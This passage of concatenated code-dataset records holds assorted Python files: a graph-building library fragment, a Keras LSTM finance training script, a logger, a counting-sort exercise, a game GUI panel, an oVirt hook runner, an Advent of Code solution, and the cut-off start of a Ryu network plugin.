frozenset(relation.end_node.merge_property_keys),\n )\n\n if rel_id not in self._relSets:\n self._relSets[rel_id] = RelationshipSet(\n rel_type=relation.relation_type,\n start_node_labels=relation.start_node.labels,\n end_node_labels=relation.end_node.labels,\n start_node_properties=relation.start_node.merge_property_keys,\n end_node_properties=relation.end_node.merge_property_keys,\n )\n return self._relSets[rel_id]\n\n def add_node_to_cache(self, node: Node):\n \"\"\"Add a new [dict2graph.Node][] to the dict2graph cache.\n This method is only relevant for [`Transformers`](/use_transformers).\n\n You will probably only need it if you create [custom Transformers](/diy_transformer).\n\n Args:\n node (Node): The [dict2graph.Node][] to add.\n \"\"\"\n self._node_cache_feeder.append(node)\n\n def add_rel_to_cache(self, rel: Relation):\n \"\"\"Add a new [dict2graph.Relation][] to the dict2graph cache.\n This method is only relevant for [`Transformers`](/use_transformers).\n\n You will probably only need it if you create [custom Transformers](/diy_transformer).\n\n Args:\n rel (Relation): The [dict2graph.Relation][] to add.\n \"\"\"\n self._rel_cache_feeder.append(rel)\n\n def _flush_cache(self):\n self._feed_cache_with_new_nodes_and_rels()\n self._run_transformations()\n for node in self._node_cache:\n if not node.deleted:\n self._manifest_node_from_cache(node)\n for rel in self._rel_cache:\n if not rel.deleted:\n self._manifest_rel_from_cache(rel)\n self._node_cache = []\n self._rel_cache = []\n\n def _run_transformations(self):\n for (\n matcher_trans_node_container\n ) in self.matcher_and_node_transformers_stack.containers:\n for node in self._node_cache:\n if (\n matcher_trans_node_container.matcher._match(node)\n and not node.deleted\n ):\n for trans in matcher_trans_node_container.transformers:\n trans._run_custom_node_match_and_transform(node)\n self._feed_cache_with_new_nodes_and_rels()\n\n for (\n matcher_trans_rel_container\n ) in self.matcher_and_rel_transformers_stack.containers:\n for rel in self._rel_cache:\n if matcher_trans_rel_container.matcher._match(rel) and not rel.deleted:\n for trans in matcher_trans_rel_container.transformers:\n trans._run_custom_rel_match_and_transform(rel)\n\n 
self._feed_cache_with_new_nodes_and_rels()\n\n def _feed_cache_with_new_nodes_and_rels(self):\n self._node_cache.extend(self._node_cache_feeder)\n self._node_cache_feeder = []\n self._rel_cache.extend(self._rel_cache_feeder)\n self._rel_cache_feeder = []\n","repo_name":"DZD-eV-Diabetes-Research/dict2graph","sub_path":"dict2graph/dict2graph.py","file_name":"dict2graph.py","file_ext":"py","file_size_in_byte":27347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
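The dict2graph record above documents `parse()`, `merge()` and `create()` separately but never shows them end to end. A minimal usage sketch, assuming a locally reachable Neo4j server; the URI and auth values below are placeholders, not from the source:

```python
# Minimal sketch of the parse -> merge flow documented above.
# Assumptions: a running Neo4j instance; URI/credentials are placeholders.
from neo4j import GraphDatabase
from dict2graph import Dict2graph

driver = GraphDatabase.driver("neo4j://localhost", auth=("neo4j", "test"))

d2g = Dict2graph()
d2g.parse({"car": {"wheels": 4}})   # first parse pass
d2g.parse({"car": {"wheels": 4}})   # second pass with identical data
# merge() deduplicates on labels + properties: one (:car {wheels: 4}) node.
d2g.merge(driver)
```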
+{"seq_id":"12377930869","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\n\n### load Data \nimport tensorflow as tf\nimport gzip\nfrom time import time\nfrom tensorflow.python.client import device_lib\nprint(device_lib.list_local_devices())\nimport keras as ks\nimport keras\nimport numpy as np\nimport keras.backend as K\nfrom random import random\nfrom random import randint\nfrom numpy import array\nfrom numpy import zeros\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import TimeDistributed\nfrom tensorflow.keras.layers import Conv1D\nfrom tensorflow.keras.layers import MaxPooling1D\nfrom tensorflow.keras.layers import AveragePooling1D\nfrom tensorflow.keras.callbacks import LambdaCallback\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.layers import concatenate\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.utils import multi_gpu_model\nimport multiprocessing\n#from eli5.sklearn import PermutationImportance\n#from numba import jit\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.callbacks import ModelCheckpoint\n#from keras.callbacks import TensorBoard\nfrom hyperopt import Trials, STATUS_OK, tpe\nfrom hyperas import optim\nfrom hyperas.distributions import choice\nimport numpy as np\nimport pickle \nimport os\nfrom keras.preprocessing.sequence import TimeseriesGenerator\n\n\n# In[5]:\n\n\n\nimport multiprocessing\n#import dask.dataframe as dk\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\n\n#import matplotlib.pyplot as plt\nidx=pd.IndexSlice\nfrom sklearn.metrics import make_scorer, r2_score,accuracy_score,precision_score\nfrom sklearn.externals import joblib\nimport os\nimport gc\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom tqdm import tqdm\nimport inspect \n\n\n# In[6]:\n\n\n\nmultiprocessing.cpu_count()\n\n\n# In[ ]:\n\n\n\ndef data():\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n Year=readConfigForLoading['Year'][0]\n lookBackYear=readConfigForLoading['lookBackYear'][0]\n LSTMWindow = readConfigForLoading['LSTMWindow'][0]\n NumberOfFeatures = readConfigForLoading['NumberOfFeatures'][0]\n \n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(Year) +'lookBackYear' +str(lookBackYear) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n X_train=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(Year) +'lookBackYear' +str(lookBackYear) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n y_train=pickle.load( handle)\n\n \n #y_train=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempYtrainHyper5.pkl.npy')\n #X_test=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempXtestHyper5.pkl.npy')\n #y_test=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempYtestHyper5.pkl.npy')\n print(1)\n #, X_test, 
y_test\n return X_train, y_train\n\n\n# In[ ]:\n\n\ndef create_model(X_train, y_train):\n \n def inception_module(layer_in, f1, f2, f3):\n\n conv1 =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n \n conv3 =TimeDistributed( Conv1D(f2, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv3 = TimeDistributed(Conv1D(f2, kernel_size=3, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv3)\n \n conv5 =TimeDistributed( Conv1D(f3, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv5 = TimeDistributed(Conv1D(f3, kernel_size=5, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv5)\n \n pool = TimeDistributed(AveragePooling1D(pool_size=3, strides=1, padding='same'))(layer_in)\n pool =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(pool)\n layer_out = concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n \n print(1)\n APPENDweights=[]\n size=377\n\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n length = readConfigForLoading['LSTMWindow'][0]\n n_features = readConfigForLoading['NumberOfFeatures'][0]\n def simple_sharpe_loss_function(y_actual,y_predicted):\n M=52\n M=K.cast(M,dtype='float32')\n sharpe_loss_value=K.mean(y_actual*y_predicted)/K.std(y_actual*y_predicted)*K.sqrt(M)\n return sharpe_loss_value\n #,'three','four','five','six','seven'\n visible = Input(shape=(None,n_features,1))\n layer=visible\n deepInceptionLayers={{choice(['one'])}}\n if deepInceptionLayers == 'one':\n NumberOfLayers=1\n elif deepInceptionLayers == 'two':\n NumberOfLayers=2\n elif deepInceptionLayers == 'three':\n NumberOfLayers=3\n elif deepInceptionLayers == 'four':\n NumberOfLayers=4\n elif deepInceptionLayers == 'five':\n NumberOfLayers=5\n elif deepInceptionLayers == 'six':\n NumberOfLayers=6\n elif deepInceptionLayers == 'seven':\n NumberOfLayers=7\n \n filter1D={{choice([1,3])}}\n filter3D={{choice([1,3])}}\n filter5D={{choice([1,3])}}\n# pool_size={{choice([ 1,2])}}\n momentum= 0.9\n for ii in np.arange(0,NumberOfLayers):\n layer = inception_module(layer, f1=filter1D, f2=filter3D, f3=filter5D)\n layer = TimeDistributed(BatchNormalization(momentum=momentum))(layer)\n# if {{choice(['one','two'])}} == 'one':\n# layer = TimeDistributed(MaxPooling1D(pool_size=pool_size))(layer)\n# else:\n# layer = TimeDistributed(AveragePooling1D(pool_size=pool_size))(layer)\n # 10,20,30,40 \n layer = TimeDistributed(Conv1D(1, kernel_size={{choice([20])}}, activation='relu', kernel_initializer='glorot_normal'))(layer)\n layer = TimeDistributed(Flatten())(layer)\n layer= LSTM(units={{choice([5,10,20,30,40,60,80,100,120])}}, kernel_initializer='glorot_normal',bias_initializer='glorot_normal',recurrent_dropout={{choice([0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8])}})(layer)\n if {{choice(['one','two'])}}=='one':\n layer = Dense(units={{choice([5,10,20])}},activation='relu',)(layer)\n layer = Dense(1, activation='linear')(layer)\n#dropout={{choice([0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8])}}\n model = Model(inputs=visible,outputs=layer) \n opt=Adam(lr={{choice([0.00001,0.0001,0.001,0.01,0.1])}},clipnorm={{choice([0.0001,0.001,0.01,0.1,1])}})\n model.compile(loss=simple_sharpe_loss_function, optimizer=opt)\n model.summary()\n 
es=EarlyStopping(monitor='val_loss',mode='min',verbose=1,patience=25)\n checkpoint = ModelCheckpoint('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/BestModel.hdf5', monitor='val_loss', verbose=1, save_best_only=True, mode='min',period=10) \n callback_List = [es, checkpoint]\n result=model.fit(X_train, y_train, batch_size=6000, epochs=5,callbacks = callback_List, validation_split=0.1,verbose=2)\n validation_acc = np.amin(result.history['val_loss'])\n print('Best validation acc of epoch:', -validation_acc)\n return {'loss': validation_acc,'status': STATUS_OK,'model':model}\n\n\n# In[ ]:\n\n\ndef continueToTrainModel(params):\n \n def inception_module(layer_in, f1, f2, f3):\n\n conv1 =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n \n conv3 =TimeDistributed( Conv1D(f2, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv3 = TimeDistributed(Conv1D(f2, kernel_size=3, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv3)\n \n conv5 =TimeDistributed( Conv1D(f3, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv5 = TimeDistributed(Conv1D(f3, kernel_size=5, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv5)\n \n pool = TimeDistributed(AveragePooling1D(pool_size=3, strides=1, padding='same'))(layer_in)\n pool =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(pool)\n layer_out = concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n \n print(1)\n APPENDweights=[]\n size=377\n #,'two','three','four','five','six','seven'\n clipnormToChoice = [0.0001,0.001,0.01,0.1,1,10]\n deepInceptionLayersToPick = ['one']\n filter1D = [1,3]\n filter1D_1 = [1,3]\n filter1D_2 = [1,3]\n kernel_size = [2]\n learningRateToChoice = [0.00001,0.0001,0.001,0.01,0.1,1]\n# pool_size = [1]\n# pool_stride = [1]\n\n recurrent_dropout = [0,0.1,0.2,0.3,0.4,0.5]\n recurrent_dropout_1 = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8]\n recurrent_dropout_2 =['one','two']\n unitsToChoice = [5, 10, 20, 40, 60, 80, 100, 120]\n units_1 = [5, 10, 20]\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n length = readConfigForLoading['LSTMWindow'][0]\n n_features = readConfigForLoading['NumberOfFeatures'][0]\n def simple_sharpe_loss_function(y_actual,y_predicted):\n M=52\n M=K.cast(M,dtype='float32')\n sharpe_loss_value=K.mean(y_actual*y_predicted)/K.std(y_actual*y_predicted)*K.sqrt(M)\n return sharpe_loss_value\n\n visible = Input(shape=(None,n_features,1))\n layer=visible\n deepInceptionLayers=deepInceptionLayersToPick[params['deepInceptionLayers']]\n if deepInceptionLayers == 'one':\n NumberOfLayers=1\n elif deepInceptionLayers == 'two':\n NumberOfLayers=2\n elif deepInceptionLayers == 'three':\n NumberOfLayers=3\n elif deepInceptionLayers == 'four':\n NumberOfLayers=4\n elif deepInceptionLayers == 'five':\n NumberOfLayers=5\n elif deepInceptionLayers == 'six':\n NumberOfLayers=6\n elif deepInceptionLayers == 'seven':\n NumberOfLayers=7\n \n filter1D=filter1D[params['filter1D']]\n filter3D=filter1D_1[params['filter1D_1']]\n filter5D=filter1D_2[params['filter1D_2']]\n# pool_size={{choice([3,5,9,16,25,34])}}\n #pool_stride={{choice([None,1, 2,3])}}\n momentum= 0.9\n for ii in np.arange(0,NumberOfLayers):\n layer = inception_module(layer, f1=filter1D, f2=filter3D, 
f3=filter5D)\n layer = TimeDistributed(BatchNormalization(momentum=momentum))(layer)\n# if {{choice(['one','two'])}} == 'one':\n# layer = MaxPooling1D(pool_size=pool_size)(layer)\n# else:\n# layer = AveragePooling1D(pool_size=pool_size)(layer)\n \n layer = TimeDistributed(Conv1D(1, kernel_size=kernel_size[params['kernel_size']], activation='relu', kernel_initializer='glorot_normal'))(layer)\n layer = TimeDistributed(Flatten())(layer)\n layer= LSTM(units=unitsToChoice[params['units']], kernel_initializer='glorot_normal',bias_initializer='glorot_normal',recurrent_dropout=recurrent_dropout_1[params['recurrent_dropout']])(layer)\n if recurrent_dropout_2[params['recurrent_dropout_1']] =='one':\n layer = Dense(units=units_1[params['units_1']],activation='relu')(layer)\n layer = Dense(1, activation='linear')(layer)\n\n model = Model(inputs=visible,outputs=layer) \n opt=Adam(lr=learningRateToChoice[params['lr']],clipnorm=clipnormToChoice[params['clipnorm']])\n model.compile(loss=simple_sharpe_loss_function, optimizer=opt)\n model.summary()\n\n return model\n\n\n# In[ ]:\n\n\n\nmodelName='InceptionLSTM'\ngc.collect()\npredictionPeriod=1\nLSTMWindow=21\nyearsBack=np.arange(1,2)\nNumberOfFeatures=100\nepochs=5\nbatch_size=4000\nfor jj in yearsBack:\n years=np.arange(2008,2015)\n best_model = None\n for ii in years:\n print(years)\n lowYear=ii-jj\n config=pd.DataFrame([[ii, jj ,LSTMWindow, NumberOfFeatures]],columns=['Year','lookBackYear','LSTMWindow','NumberOfFeatures'])\n config.to_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n if best_model is None:\n best_run, best_model = optim.minimize(model=create_model,\n data=data,\n algo=tpe.suggest,\n max_evals=2,\n trials=Trials())\n print('best model over the optmization')\n print(best_run)\n model=best_model\n \n else:\n model=continueToTrainModel(best_run)\n es=EarlyStopping(monitor='val_loss',mode='min',verbose=2,patience=25) \n checkpoint = ModelCheckpoint('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/BestModelInceptionLSTM.hdf5', monitor='val_loss', verbose=1, save_best_only=True, mode='min',period=10) \n# tensorboard = TensorBoard(log_dir=r\"D:\\ML for Finance\\data\\logs\\{}\".format(time()),histogram_freq=10,write_graph=True,write_images=True,update_freq=\"epoch\")\n #tensorboard\n callback_List = [es, checkpoint] \n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(ii) +'lookBackYear' +str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n X_train=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(ii) +'lookBackYear' +str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n y_train=pickle.load( handle)\n\n result=model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs,callbacks = callback_List, validation_split=0.1,verbose=2)\n validation_acc = np.amin(result.history['val_loss'])\n print('Best validation acc of epoch:', -validation_acc)\n\n \n \n model_json = model.to_json()\n with open('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/ ' + modelName +'Model' + str(ii) + 'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.json',\"w\") as json_file:\n json_file.write(model_json)\n \n best_model.save_weights('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/ ' + modelName +'ModelWeights' + str(ii) +'yearsBackHyperopt' + 
str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.h5')\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n ValidationData=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n ValidationTarget=pickle.load( handle)\n \n with open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/indexObjectYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.csv', 'rb') as handle:\n validationIndex=pd.read_csv( handle,parse_dates=['1']) \n# \n validationIndex.rename(columns={'0':'entityID', '1':'date'},inplace=True) \n validationIndex.set_index(['entityID','date'],inplace=True,drop=False)\n validationIndex.drop(columns='Unnamed: 0',inplace=True)\n\n \n \n pred1=best_model.predict(ValidationData, batch_size=2000)\n print(2)\n pred1=pd.DataFrame(pred1)\n pred1['targets']=ValidationTarget\n pred1['entityID']=validationIndex['entityID'].values\n pred1['date']=validationIndex['date'].values\n pred1.set_index(['entityID','date'],inplace=True)\n pred1.to_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/data' + modelName +'Prediction' + str(ii) +'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.csv')\n\n","repo_name":"SteffenRoe/4376-DL-Project","sub_path":"InceptionLSTMFor100.py","file_name":"InceptionLSTMFor100.py","file_ext":"py","file_size_in_byte":16915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
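The `simple_sharpe_loss_function` in the record above computes an annualized Sharpe ratio with Keras backend ops, where `M=52` annualizes weekly returns. A plain-NumPy mirror of the same arithmetic (function and argument names are mine, for illustration) is handy for sanity-checking the loss outside a model:

```python
# Illustrative NumPy mirror of the Keras simple_sharpe_loss_function above.
import numpy as np

def simple_sharpe(y_actual, y_predicted, periods_per_year=52):
    # Element-wise product = per-period strategy return when y_predicted is
    # a position signal; sqrt(periods_per_year) annualizes, as in the loss.
    r = np.asarray(y_actual) * np.asarray(y_predicted)
    return r.mean() / r.std() * np.sqrt(periods_per_year)

print(simple_sharpe([0.01, -0.02, 0.03], [1.0, -1.0, 1.0]))
```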
+{"seq_id":"37306967782","text":"\"\"\"\nLogger is a class to manage log output and format so that we\ndon't have to pass loggers into methods or classes in order\nto get the desired results.\n\"\"\"\n\nimport logging\n\nclass Logger(object):\n \"\"\"\n Logger class that is a little messy and requires you to run\n configure() before using any of the other methods. Not in love\n with this setup but it allow me to not pepper logging throughout\n the application and have to pass it down 3 levels to get it to the\n proper class.\n \"\"\"\n logger = \"\"\n\n @classmethod\n def configure(cls):\n \"\"\"\n Create configuration for logger and change\n the default format that it uses.\n \"\"\"\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger_handler = logging.StreamHandler()\n logger.addHandler(logger_handler)\n logger_handler.setFormatter(logging.Formatter('%(message)s'))\n cls.logger = logger\n\n @classmethod\n def info(cls, string, *opts):\n \"\"\"\n Print info out to screen\n \"\"\"\n cls.logger.info(string, *opts)\n","repo_name":"michaeljs1990/compress","sub_path":"compress/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"}
+{"seq_id":"32387641043","text":"def maxPro(arr): # 최댓값 구하는 함수\n maxV = arr[0]\n for a in arr:\n if maxV < a:\n maxV = a\n return maxV\n\ndef toString(string): # 숫자 리스트를 문자열로 바꾸는 함수\n res = ''\n for s in string:\n res += str(s) + ' '\n return res\n\nT = int(input()) #test case 개수\n\nfor tc in range(1, T+1):\n N = int(input())\n nums = list(map(int, input().split()))\n cnt = [0] * int(maxPro(nums) + 1) # (nums의 최대 숫자 +1)개를 갖는 배열\n temp = [0] * N # 새로 정리된 숫자를 받을 배열\n\n for num in nums:\n cnt[num] += 1 # nums의 수를 확인하고, 그 수로 인덱스를 갖는 곳에 1 추가\n # print(cnt)\n for i in range(1, len(cnt)): # 누적합\n cnt[i] = cnt[i-1] + cnt[i]\n # print(cnt)\n # print(len(nums)-1)\n # print('----------------')\n for i in range(len(nums)-1, -1, -1): # i = 배열의 끝 인덱스부터 하나씩 내려올거야\n cnt[nums[i]] -= 1 # nums[i]번째 값을 인덱스로 갖는 cnt의 값을 하나 줄여준다.\n # print(cnt)\n # print(nums[i])\n temp[cnt[nums[i]]] = nums[i] # 하나 줄인값을 인덱스로 갖�� temp값에 nums[i]넣는다.\n\n print(f'#{tc} {toString(temp)}')","repo_name":"better-gyeom/Python_Algorithm","sub_path":"SWEA/D2/1966. 숫자를 정렬하자/숫자를 정렬하자.py","file_name":"숫자를 정렬하자.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40713871693","text":"from direct.gui.DirectGui import *\nfrom pandac.PandaModules import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom otp.otpbase import OTPGlobals\nfrom pirates.piratesgui import PDialog\nfrom pirates.piratesgui import GuiPanel\nfrom pirates.piratesgui import PiratesGuiGlobals\nfrom pirates.piratesbase import PiratesGlobals\nfrom pirates.piratesbase import PLocalizer\nfrom pirates.band import BandConstance\nfrom pirates.piratesgui.RequestButton import RequestButton\n\nclass CrewInviteeButton(RequestButton):\n \n def __init__(self, text, command):\n RequestButton.__init__(self, text, command)\n self.initialiseoptions(CrewInviteeButton)\n\n\n\nclass CrewInvitee(GuiPanel.GuiPanel):\n notify = DirectNotifyGlobal.directNotify.newCategory('CrewInvitee')\n \n def __init__(self, avId, avName):\n GuiPanel.GuiPanel.__init__(self, 'Crew Invitation', 0.5, 0.5, showClose = False)\n self.initialiseoptions(CrewInvitee)\n self.setPos(0.15, 0, 0.25)\n self.avId = avId\n self.avName = avName\n if base.cr.avatarFriendsManager.checkIgnored(self.avId):\n self.__handleNo()\n return\n \n text = PLocalizer.CrewInviteeInvitation % self.avName\n self.message = DirectLabel(parent = self, relief = None, text = text, text_scale = PiratesGuiGlobals.TextScaleLarge, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_wordwrap = 11, pos = (0.25, 0, 0.35), textMayChange = 1)\n self.bOk = CrewInviteeButton(text = PLocalizer.CrewInviteeOK, command = self.__handleOk)\n self.bOk.reparentTo(self)\n self.bOk.setPos(0.1, 0, 0.05)\n self.bNo = CrewInviteeButton(text = PLocalizer.CrewInviteeNo, command = self.__handleNo)\n self.bNo.reparentTo(self)\n self.bNo.setPos(0.3, 0, 0.05)\n self.accept('BandRequestCancel-%s' % (self.avId,), self.__handleCancelFromAbove)\n \n def destroy(self):\n if hasattr(self, 'destroyed'):\n return\n \n self.destroyed = 1\n self.ignore('BandRequestCancel-%s' % (self.avId,))\n self.ignore('Esc')\n GuiPanel.GuiPanel.destroy(self)\n \n def __handleOk(self):\n base.cr.PirateBandManager.d_invitationResponce(self.avId, BandConstance.outcome_ok)\n self.destroy()\n\n def __handleNo(self):\n base.cr.PirateBandManager.d_invitationResponce(self.avId, BandConstance.outcome_declined)\n self.destroy()\n \n def __handleCancelFromAbove(self):\n self.destroy()\n\n\n","repo_name":"PiratesOnlineClassic/pirates-online-classic","sub_path":"pirates/piratesgui/CrewInvitee.py","file_name":"CrewInvitee.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"}
+{"seq_id":"3213324052","text":"import logging\nimport os\n\nfrom ovirt.node import base\nfrom ovirt.node.utils import process\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Hooks(base.Base):\n \"\"\"A utility class which executes files for additional configuration\n beyond the normal install\n \"\"\"\n\n known = [\"pre-upgrade\", \"post-upgrade\", \"rollback\", \"on-boot\",\n \"on-changed-boot-image\"]\n\n legacy_hooks_directory = \"/etc/ovirt-config-boot.d/\"\n hooks_path_tpl = \"/usr/libexec/ovirt-node/hooks/{name}\"\n\n @staticmethod\n def post_auto_install():\n Hooks.__run(Hooks.legacy_hooks_directory)\n\n @staticmethod\n def emit(name):\n \"\"\"Signal that a specific event appeared, and trigger the hook handlers\n\n Args:\n name: Name of the hook (bust be in Hooks.known)\n \"\"\"\n assert name in Hooks.known\n path = Hooks.hooks_path_tpl.format(name=name)\n Hooks.__run(path)\n\n @staticmethod\n def __run(hooks_directory):\n for hook in os.listdir(hooks_directory):\n script = os.path.join(hooks_directory, hook)\n\n if script.endswith(\".pyc\") or script.endswith(\".pyo\"):\n continue\n\n LOGGER.debug(\"Running hook %s\" % script)\n if script.endswith(\".py\"):\n output = process.check_output([\"python\", script])\n else:\n output = process.check_output(\"%s &> /dev/null\" % script,\n shell=True)\n\n [LOGGER.debug(\"%s: %s\" % (script, line)) for line in output]\n","repo_name":"oVirt/ovirt-node","sub_path":"src/ovirt/node/utils/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"}
+{"seq_id":"35335162899","text":"# https://adventofcode.com/2017/day/3\n\nfrom collections import defaultdict\nfrom itertools import count\n\ndef spiral(Δ = 1j):\n i = 1; yield 1, 0 # i, pos\n for side_len in count(3, step=2):\n pos = (1 - 1j) * (side_len//2)\n for _ in range(4):\n for _ in range(side_len-1):\n i += 1; pos += Δ\n yield i, pos\n Δ *= 1j\n\ndef fst_star(stop):\n abs_int = lambda x: abs(int(x))\n for x, pos in spiral():\n if x == stop: \n return sum(map(abs_int, [pos.real, pos.imag]))\n\ndef snd_star(stop):\n grid = defaultdict(int, {0: 1})\n for i, pos in spiral():\n if i == 1: continue\n grid[pos] = sum( \n grid[pos + Δ] \n for Δ in [\n -1+1j, 1j, 1+1j, \n -1 , 1, \n -1-1j, -1j, 1-1j, \n ]\n )\n if grid[pos] > stop: return grid[pos]\n\nif __name__ == '__main__':\n assert fst_star(1) == 0\n assert fst_star(12) == 3\n assert fst_star(23) == 2\n assert fst_star(1024) == 31\n\n print(fst_star(265149))\n print(snd_star(265149))\n\n","repo_name":"andy1li/adventofcode","sub_path":"2017/day03_spiral.py","file_name":"day03_spiral.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"21972020219","text":"from ryu.app import client\nfrom ryu.app.client import ignore_http_not_found\nfrom ryu.app import rest_nw_id\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import exc as orm_exc\n\nfrom quantum.common import constants as q_const\nfrom quantum.common import exceptions as q_exc\nfrom quantum.common import topics\nfrom quantum.db import api as db\nfrom quantum.db import db_base_plugin_v2\nfrom quantum.db.dhcp_rpc_base import DhcpRpcCallbackMixin\nfrom quantum.db import l3_db\nfrom quantum.db import models_v2\nfrom quantum.openstack.common import cfg\nfrom quantum.openstack.common import log as logging\nfrom quantum.openstack.common import rpc\nfrom quantum.openstack.common.rpc import dispatcher\nfrom quantum.plugins.ryu.common import config\nfrom quantum.plugins.ryu.db import api_v2 as db_api_v2\nfrom quantum.plugins.ryu import ofp_service_type\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass RyuQuantumPluginV2(db_base_plugin_v2.QuantumDbPluginV2,\n l3_db.L3_NAT_db_mixin):\n\n supported_extension_aliases = [\"router\"]\n\n def __init__(self, configfile=None):\n options = {\"sql_connection\": cfg.CONF.DATABASE.sql_connection}\n options.update({'base': models_v2.model_base.BASEV2})\n reconnect_interval = cfg.CONF.DATABASE.reconnect_interval\n 